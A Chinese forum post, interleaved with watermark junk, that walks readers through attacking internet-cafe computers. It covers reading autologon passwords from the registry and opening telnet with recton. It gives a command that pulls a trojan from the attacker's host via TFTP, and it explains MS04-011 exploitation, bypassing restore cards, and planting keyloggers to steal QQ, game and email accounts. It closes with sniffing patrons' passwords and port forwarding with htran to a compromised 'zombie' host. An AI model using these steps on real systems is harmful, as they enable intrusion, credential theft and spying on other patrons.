网吧入侵的战役
一. 网吧入侵 打造最好的电脑自学交流论坛 M- S- f$ C1 d+ U4 w: o6 }) Q
) [ R( q |2 K& ^ l打造最好的电脑自学交流论坛 入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆! www.520diannao.com9 {& \8 I R* I* F
$ ]$ c/ f" M% G* _* r
这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。 ( d, K( U% X) E2 O: z" O
为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。
; d! {& |1 C6 v$ [www.520diannao.com打造最好的电脑自学交流论坛0 J0 [! J9 o N5 i: ~" U
知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。1 B7 i* @3 i, O4 k4 o& v6 L/ ^$ g
www.520diannao.com3 ^- z% g/ x2 n
开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get 3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。
2 R* ], C0 X! g* r, b我爱电脑技术社区--打造最好的电脑技术自学交流平台另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。 -
5 X# M& \. O% d打造最好的电脑自学交流论坛
1 I- f) _/ @9 }" J# r我爱电脑技术社区--打造最好的电脑技术自学交流平台还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。 我爱电脑技术社区--打造最好的电脑技术自学交流平台1 c v. A y' X8 g2 V- M M. ^
: _7 L: x4 n8 H. G5 B7 Uwww.520diannao.com二.网吧木马
' V8 S& E" Q/ D8 W. ]* ?我爱电脑技术社区--打造最好的电脑技术自学交流平台
: X6 n" L" E; x z- I! h我爱电脑技术社区--打造最好的电脑技术自学交流平台 在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了
& t) ?! F @: z% @# S电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 t7 j$ O7 F7 _& e4 I
一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站& j- a4 |0 j# ?0 S3 a
4 @5 Q' V3 g' {/ Y我爱电脑技术社区--打造最好的电脑技术自学交流平台 描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码, 我爱电脑技术社区--打造最好的电脑技术自学交流平台9 x1 e: \2 I- @4 a" ]6 @9 G
我爱电脑技术论坛4 v& I/ q8 d0 G @' g
当你AH=2的时,它便会call原始INT 13地址来完成(商周)作.
6 X( `! r0 Q) ywww.520diannao.com
( s1 Z- e& |* h0 i+ h电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站只要找到原始INT 13入口便可以为所欲为.
' W2 M, V" t5 swww.520diannao.com具体过程如下:
9 c8 |; F6 G" F% G, C4 o0 ?打造最好的电脑自学交流论坛打造最好的电脑自学交流论坛1 a' }/ x+ X! J" p& j' x( B
开机过程按住F8键,进入纯dos环境, 注";"后为注释. 我爱电脑技术社区--打造最好的电脑技术自学交流平台0 i* B$ j# n9 I: @/ Q' F+ J
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, c9 S5 h) y# E f/ o% F3 Z' b& }' k
出现提示符c:
9 x+ q% u9 Z+ s电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站键入c:\debug, 打造最好的电脑自学交流论坛. {9 x) w. @% n- z u9 H5 _# b- q
打造最好的电脑自学交流论坛9 E* w! b5 Q. D) a3 Y4 y$ G
( r' A/ a" W3 u5 j. B4 b5 hwww.520diannao.com寻找原始的int 13入口.
: X0 ?7 Z) y0 ^" k电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
" R- Z! w' K6 W6 {% ? 然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx . ]: X! _( l/ X# c4 D+ t( G! ^
! V( z, u8 D7 q6 k
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
! Q) L, d* H; D打造最好的电脑自学交流论坛电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 @( l6 g/ o! O1 E7 d6 a& W
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。 我爱电脑技术论坛7 j6 O Z, t, I' c0 m
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. m4 S) D3 Z' v( x4 }, O9 u6 s$ g
例如俺的得到的地址是F000:9A95
) V& q/ H6 M- _$ O: j我爱电脑技术社区--打造最好的电脑技术自学交流平台我爱电脑技术论坛+ k! u7 K/ z( e# @
再次运行debug ,键入: 我爱电脑技术社区--打造最好的电脑技术自学交流平台& m; D3 i* q+ P% M! I8 |7 B
的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中.我爱电脑技术社区--打造最好的电脑技术自学交流平台7 D8 J" p( i7 O- g! Z
我爱电脑技术社区--打造最好的电脑技术自学交流平台; a5 t0 O: R: U/ d1 [. X( {
+ P% J! l9 `: A$ x7 k5 i$ qwww.520diannao.com注: 填的时候要仔细,填错的话会死机。ok,破解完成. 打造最好的电脑自学交流论坛) z8 v3 ]. z6 l- Q$ q$ O d
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站1 ^, W! e$ W+ l; [9 C
这时在提示符c:\键入 : D& ]1 i% t: a; g7 x1 ]/ L, b2 m, o
2 n& J( {# B2 D; O. ~- d Y电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
: ?' l% i+ J6 q电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次的启动都会被还原卡存储起来。
9 C; t# r8 h/ d$ Y5 l+ m电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站
! W0 `' K1 b% E1 j3 k- L0 b3 z# v 这种办法大家都知道,不过操作起来也有点危险,弄不好启动不了。而且win2000没有dos环境,到底性不行呢?呵呵,我还没有做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载,到底什么工具最好使,大家自己测试。 打造最好的电脑自学交流论坛: A4 R9 }7 S* p0 a0 |
打造最好的电脑自学交流论坛3 ^3 @0 d3 d4 E
至于还原卡,网上有密码读取器,不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解,次方法很奏效, www.520diannao.com, v/ H2 ^* j E f$ k
5 w$ Q( G$ U( }, w! { 应该是最好的办法。先随便输个错误的密码,弹出错误窗口后不动,用winhex查找主要内存,找到还原精灵,再搜索我们开始输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单,就不截图了!电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 r" s2 R9 E8 o: J0 s
' r& P9 j+ C# g, \) u! l3 B E0 M电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 至于冰点还原,好像还没有破解办法,这个的确很厉害。不过他有个选项,就是重启多少次后不还原,没事你可以多重启试一下,别把机子整坏了就行。
/ |4 D0 p4 K5 i& R* k e( z5 I
: v) {9 M+ @9 j" d打造最好的电脑自学交流论坛破了还原后就装木马了。我们最好装键盘记录或密码截获木马,盗qq,游戏账号,邮箱账号等等。比如密码结巴等工具,也可以 把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样,而你有能力入侵了那个网站,在默认主页上挂马那更好!
4 ]% @: ~, \ u6 W* L4 \! Z4 gwww.520diannao.com电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站5 p6 f3 j& ]- ?. Q
三.网吧嗅探。 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站1 W. s/ {% B! X& t5 O/ S+ N
2 u2 l7 j1 K! ]0 M# W电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站 如果你想知道网吧某个mm或者gg的qq号,那你就用QQSniffer(QQ第6感..很好用滴..嘿嘿),Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是 xsiff.exe -pass -hide -log pass.log xsiff.exe -tcp -udp -asc -addr 192.168.1.1。如果你不喜欢着个,还有个密码监听器,密码监听器用于监听网页的密码,包括网页上的邮箱、论坛、聊天室等等。只需在一台电脑上运行,就可以监听局域网内任意一台电脑登录的账号和密码,并将密码显示、保存,或发送到用户指定的邮箱。我就经常有密码监听器2.4破解版在网吧监听别人
# d9 B7 T; @# ~" ^8 ^9 l% R我爱电脑技术论坛
, i/ r$ e6 v4 l; W3 R' i我爱电脑技术论坛 密码!当然网吧最适合dns欺骗!
+ d. F5 s# w) k) |, _* L7 N1 W我爱电脑技术论坛
/ d3 V7 t0 U5 _7 p2 Z) mwww.520diannao.com 四.端口转发。
8 k/ N8 C; @; {我爱电脑技术论坛$ A, m; c7 X/ \+ k
为了能随时随地控制网吧机器,在家也可以!我们最好来个端口转发。首先我们可以用fport.exe(这个工具在angelshell1.0包里面有),格式为fport 但是使用他可以不必安装后门,只需要普通的权限即可执行。网吧服务器一般是win2000server版的,我们趁管理员不注意,给他开3389。如果他的ip为192.168.0.1,我们就在他的命令行下执行fport.exe 3389 myip 9999,这里的myip可以是我们的一只有公网ip的肉鸡。我们再在公网ip的肉鸡上运行FportClient.exe着个是客户端。着样我们登陆公网ip的肉鸡的9999端口就进了网吧主机。在上面看第电影赶什么都行,不被发现就行了,我们动作轻点就行了。我们也可以给网吧主机装代理。就用htran2.4,SocksCap。在网吧主机命令行下上执行htran.exe -install (安装Socks5服务),htran.exe -start (启动Socks5服务),再执行"htran.exe -s -connect 共网肉鸡ip 3389。在自己的共网肉鸡上执行htran.exe -s -listen 3389 5200(监听端口).现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了网吧主机。我们也可以用vidc来映射端口,这个和fport差不多就不多说了!